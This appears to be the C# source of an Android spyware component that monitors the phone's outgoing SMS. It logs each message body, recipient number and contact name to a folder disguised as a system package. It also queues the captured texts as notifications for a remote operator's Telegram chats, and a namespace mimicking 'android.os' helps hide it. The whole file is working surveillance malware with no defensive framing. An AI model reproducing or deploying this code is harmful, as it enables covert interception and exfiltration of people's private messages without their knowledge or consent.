using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Android.Database;
using Android.OS;
using Android.Content;
using Android.Widget;
using Android.Net;
using Android.Preferences;
using Java.IO;
using Java.Text;
using Java.Util;
using Android.App;
using Android.Runtime;
using Android.Views;
using TeleSharp.Entities.SendEntities;

namespace android.os
{
    public class SMSoutObserver : ContentObserver
    {
        private Context mCtx;
        public SMSoutObserver(Handler handler, Context ctx) : base(handler)
        {
            mCtx = ctx;
        }

        public override void OnChange(bool selfChange)
        {
            base.OnChange(selfChange);
            string folderpth = Android.OS.Environment.ExternalStorageDirectory + "/Android/data/com.systemprocces.android/System/tmp_s";
            ICursor cursor = mCtx.ContentResolver.Query(Android.Net.Uri.Parse("content://sms/outbox"), null, null, null, null);
            if (cursor.MoveToLast())
            {
                string last = inf.Values.sharep.GetString("lastsms","");
                string msgData = cursor.GetString(cursor.GetColumnIndexOrThrow("body"));
                string phoneNumber = cursor.GetString(cursor.GetColumnIndexOrThrow("address"));
                if (msgData != last)
                {
                    try
                    {
                        SimpleDateFormat sdf = new SimpleDateFormat("yyyy\\MM\\dd_HH:mm:ss");
                        string currentDateandTime = sdf.Format(new Date());
                        inf.Values.sharep.Edit().PutString("lastsms", msgData).Commit();
                        if (phoneNumber.StartsWith("+98"))
                            phoneNumber = phoneNumber.Replace("+98", "0");
                        string name = Contacts.number_to_name(phoneNumber);
                        if (name == "")
                        {
                            if (phoneNumber.StartsWith("0"))
                            {
                                name = Contacts.number_to_name(phoneNumber.Replace("0", "+98"));
                                if (name == "")
                                    name = phoneNumber;
                            }
                            else
                                name = phoneNumber;
                        }
                        Filef.writeappend("                    DateTime: " + currentDateandTime + "\n                   Number: " + inf.Values.PhoneNumber + "\n                   message: " + msgData + "\n                    <==========\n", name + ".sm", folderpth);
                        if (inf.Metods.getnotifyidcount("notifys") > 0)
                        {
                            int[] ids = inf.Metods.getidsnotify("notifys", 7);
                            for (int i = 0; i < ids.Length; i++)
                            {
                                inf.NotifyList.Add(
                                   new Notification
                                   {
                                       Sms = new SmsNotify
                                       {
                                           Chat_Id = ids[i].ToString(),
                                           DateTime = DateTime.Now,
                                           Text = msgData,
                                           FromNumber = phoneNumber,
                                           Name = name
                                       }
                                   });
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.Message, ChatId = inf.Manager.ChatId });
                    }
                }
            }
            cursor.Close();
        }
    }

}